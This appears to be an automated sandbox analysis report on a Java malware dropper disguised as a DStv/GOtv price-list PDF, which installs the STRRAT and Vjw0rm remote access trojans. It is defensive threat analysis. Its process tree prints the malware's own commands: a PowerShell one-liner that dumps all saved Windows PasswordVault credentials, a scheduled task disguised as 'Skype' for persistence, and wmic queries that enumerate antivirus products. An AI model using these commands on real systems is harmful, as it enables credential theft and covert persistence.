Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    18/01/2022, 11:27

General

  • Target

    New Price List For DStv&GOtv.pdf.jar

  • Size

    189KB

  • MD5

    b1d6eafab8240680ef96194944ce3801

  • SHA1

    a9b312e682e43b28d28faf6b66c903ba12dfecf5

  • SHA256

    85daaa8ff4820b98c0d1471ed68ab675f2fea97f4d6f6f48a951b4344b9c2b38

  • SHA512

    af2daaccce5c601f4dae45ea51113eb85cb86b055dbba22bfaf131200c5ecf4f29ff66c42ae7bb1d9d6fd893cb715f1c77734f211f296ef91f98c5fa0ac37cf2

Malware Config

Signatures

  • STRRAT

    STRRAT is a remote access tool than can steal credentials and log keystrokes.

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 13 IoCs
  • Drops startup file 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\New Price List For DStv&GOtv.pdf.jar"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\system32\wscript.exe
      wscript C:\Users\Admin\_output.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1132
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OJBcFWZNgk.js"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Adds Run key to start application
        PID:632
      • C:\Program Files\Java\jre7\bin\javaw.exe
        "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\fhmzyvaqe.txt"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:428
        • C:\Program Files\Java\jre7\bin\java.exe
          "C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Users\Admin\fhmzyvaqe.txt"
          4⤵
          • Drops startup file
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\system32\cmd.exe
            cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\fhmzyvaqe.txt"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:996
            • C:\Windows\system32\schtasks.exe
              schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\fhmzyvaqe.txt"
              6⤵
              • Creates scheduled task(s)
              PID:1000
          • C:\Program Files\Java\jre7\bin\java.exe
            "C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Users\Admin\AppData\Roaming\fhmzyvaqe.txt"
            5⤵
            • Loads dropped DLL
            • Accesses Microsoft Outlook profiles
            • Suspicious use of WriteProcessMemory
            • outlook_office_path
            • outlook_win_path
            PID:1572
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1932
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:524
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:428
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter' path antivirusproduct get displayname /format:list"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:976
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1752
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list
          4⤵
            PID:1532
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:460
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:572
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic /node:localhost /namespace:'\\root\securitycenter' path antivirusproduct get displayname /format:list
      1⤵
        PID:108

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/428-67-0x0000000002110000-0x0000000005110000-memory.dmp

              Filesize

              48.0MB

            • memory/1388-55-0x000007FEFBF31000-0x000007FEFBF33000-memory.dmp

              Filesize

              8KB

            • memory/1388-58-0x0000000000120000-0x0000000000121000-memory.dmp

              Filesize

              4KB

            • memory/1388-57-0x0000000002120000-0x0000000005120000-memory.dmp

              Filesize

              48.0MB

            • memory/1572-101-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/1572-100-0x00000000021C0000-0x00000000051C0000-memory.dmp

              Filesize

              48.0MB

            • memory/1572-142-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/1572-141-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/1724-87-0x00000000022A0000-0x00000000052A0000-memory.dmp

              Filesize

              48.0MB

            • memory/1724-96-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/1724-89-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/1752-165-0x00000000026E0000-0x00000000026E2000-memory.dmp

              Filesize

              8KB

            • memory/1752-166-0x00000000026E2000-0x00000000026E4000-memory.dmp

              Filesize

              8KB

            • memory/1752-167-0x00000000026E4000-0x00000000026E7000-memory.dmp

              Filesize

              12KB

            • memory/1752-168-0x00000000026EB000-0x000000000270A000-memory.dmp

              Filesize

              124KB